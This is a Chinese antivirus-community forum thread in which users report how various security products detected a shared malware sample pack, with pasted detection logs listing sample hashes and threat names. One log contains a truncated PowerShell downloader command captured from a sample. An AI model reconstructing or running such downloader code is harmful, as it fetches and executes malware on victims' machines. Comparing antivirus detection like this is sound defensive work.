【开放测试】卡饭病毒样本包 20241028 第178期

Raven95676

Elastic

总结：miss 2x

解压kill15x


714略.exe


KHNP略.vbs


165略.xlsx miss


c652c略.exe miss


Avira

总结：miss 1x

解压+扫描kill15x

隔离区数量出现问题，故本次不展示内容


双击：

714略.exe miss





BD Free

总结：miss 6x

解压+扫描8x


066e略.exe


66ec略.exe


714略.exe miss


6716f4略.exe miss
图片不宜展示

a7eff略.exe


a32ae3略.exe miss
图片不宜展示

b42bb略.exe


c652c略.exe miss
疑似没跑起来

cc272略.exe miss
图片不宜展示

KHNP略.vbs


이지현_입사지원서.exe miss

jijianan2007

SEP解压扫描剩3个

ninjagaocc

瑞星V17
高级监控✔
人工智能引擎✔
主防15x
剩余4x（右键扫描miss）
双击测试后（因系统未安装办公软件，故跳过XLSX，对其余样本进行双击后，结果保持不变）

??        ????        ????        ??        ????        
2024-10-28 18:22:41        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
            function DownloadDataFromLinks { param ([string[]]$links)
            $webClient = New-Object System.Ne        Downloader.PowerShell/CMDL!1.C5C7        ??        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-28 18:22:07        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
            function DownloadDataFromLinks { param ([string[]]$links)
            $webClient = New-Object System.Ne        Downloader.PowerShell/CMDL!1.C5C7        ??        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-28 18:20:37        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce.exe        Spyware.Agent/PYC!1.F580        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:36        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\66ec85436947cf61b3e3ad15d0dbf5c1bb2d83b816006a376aa524cd772ce375.exe        Trojan.Miner!8.EA1        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:36        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\066e985867d56271776ab61510202ffdd1bec246fc15dd38dd17a38223d50d40.exe        Spyware.Noon!8.E7C9        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:35        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\851ad11e336605283db6bf83f52b6b08d32e3c5a5c611dee027677d309da173d.exe        Trojan.Generic!8.C3        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:35        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\741e00a1f7ef7e5fe69144adfb6023fe14d29ddcd1b9982a3ebcbced6748e8fc.exe        Trojan.Runner/SFX!1.FA4A        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:34        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\a32ae376ff206ecfdb0c4043c4e5e8dc80fabeee6c831798f6eca28f185bdae9.exe        Stealer.Browser/Autoit!1.10428        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:34        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\a7effd419e43e4d534ff7caf53b3526cd7d627baf41978b3ef65e86b45e2ea24.exe        Trojan.Miner!8.EA1        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:34        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\6716f4acee3a96a916714ddb4b602a4663b136f3d0930627a099e8392d263d20.exe        Stealer.Browser/Autoit!1.10428        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:33        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\cc272eb6410e07ea6f5ab11ebc5131d67f348d421327a931153e32550309443a.exe        Stealer.Browser/Autoit!1.10428        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:33        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06.exe        Trojan.Generic!8.C3        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:33        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488.exe        Hacktool.BitCoinMiner!8.648E        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:32        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\e2bd2ba1f6d31950c1cb3da043adcfe1f90e67d2ceab30a420c61e7d4ca075c4.exe        Trojan.Generic!8.C3        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:31        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\SecuriteInfo.com.FileRepMalware.22561.28030.exe        Spyware.Agent/PYC!1.F580        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:31        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\encrypter-windows-gui-x86.exe        Ransom.Agent!8.6B7        ??        C:\Windows\Explorer.EXE        
2024-10-28 18:20:26        C:\Users\WDAGUtilityAccount\Desktop\infected20241028\???_?????.exe        Backdoor.Androm!8.113        ??        C:\Windows\Explorer.EXE        

aikafans

eis初扫如图，剩余双击kill all，总结：全歼

jijianan2007

Cylance扫描剩5

jijianan2007

MD解压扫描剩4，双击剩1

hhjjjjjj123

卡巴剩余


Kaspersky Threat Intelligence Portal — Report — 714D338600B157FE68E58271223BC1387E1E63F8C3511E4E...



Kaspersky Threat Intelligence Portal — Report — C652C39AFDF675042C1EBC539169DB5E198276463EE8B6D1...

a1414007

AVG 扫描kill 17x

ninjagaocc

华为乾坤
右键扫描17x
双击无变化

【1】 2024-10-28 19:07:11，自定义扫描，发现风险17个风险项目

病毒库版本：2024102802
杀毒引擎版本：11.Release_2024092600
开始时间：2024-10-28 19:07:11
总计用时：00:00:24
任务状态：已完成
扫描文件：19
发现风险：17
已处理风险：17
病毒详情：
病毒名称：Doc.Trojan.Generic，病毒文件名称：165a4a88942253500f82ef8b81c04ee228c6432581ff3747813e8a4a7d8ec1a3.xlsx，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:14，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：066e985867d56271776ab61510202ffdd1bec246fc15dd38dd17a38223d50d40.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:14，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：66ec85436947cf61b3e3ad15d0dbf5c1bb2d83b816006a376aa524cd772ce375.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:15，处置结果：处置成功，处置动作：隔离
病毒名称：AutoIt.Trojan.Generic，病毒文件名称：6716f4acee3a96a916714ddb4b602a4663b136f3d0930627a099e8392d263d20.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:18，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：714d338600b157fe68e58271223bc1387e1e63f8c3511e4e76faa774269e30a6.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:18，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:19，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Backdoor.Generic，病毒文件名称：741e00a1f7ef7e5fe69144adfb6023fe14d29ddcd1b9982a3ebcbced6748e8fc.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：高，病毒类型：后门远控，病毒发现时间：2024-10-28 19:07:23，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：851ad11e336605283db6bf83f52b6b08d32e3c5a5c611dee027677d309da173d.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:23，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：SecuriteInfo.com.FileRepMalware.22561.28030.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:23，处置结果：处置成功，处置动作：隔离
病毒名称：AutoIt.Trojan.Generic，病毒文件名称：a32ae376ff206ecfdb0c4043c4e5e8dc80fabeee6c831798f6eca28f185bdae9.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:26，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：a7effd419e43e4d534ff7caf53b3526cd7d627baf41978b3ef65e86b45e2ea24.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:26，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:26，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：c652c39afdf675042c1ebc539169db5e198276463ee8b6d16380d45374884110.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:28，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:29，处置结果：处置成功，处置动作：隔离
病毒名称：AutoIt.Trojan.Generic，病毒文件名称：cc272eb6410e07ea6f5ab11ebc5131d67f348d421327a931153e32550309443a.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:28，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Ransomware.Generic，病毒文件名称：encrypter-windows-gui-x86.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：高，病毒类型：勒索软件，病毒发现时间：2024-10-28 19:07:31，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：e2bd2ba1f6d31950c1cb3da043adcfe1f90e67d2ceab30a420c61e7d4ca075c4.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\infected20241028\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-28 19:07:31，处置结果：处置成功，处置动作：隔离

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】 2024-10-28 19:09:37，自定义扫描，发现风险0个风险项目

病毒库版本：2024102802
杀毒引擎版本：11.Release_2024092600
开始时间：2024-10-28 19:09:37
总计用时：00:00:03
任务状态：已完成
扫描文件：2
发现风险：0
已处理风险：0
病毒详情：

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

123fourf

F-S p for Mac解压+自定义扫描miss 1x



MD零容忍+kart

miss 1x，双击kart拦截（云拉黑）


关MD，断网，仅Kart（卡巴断网双击参考）：
拦截 2x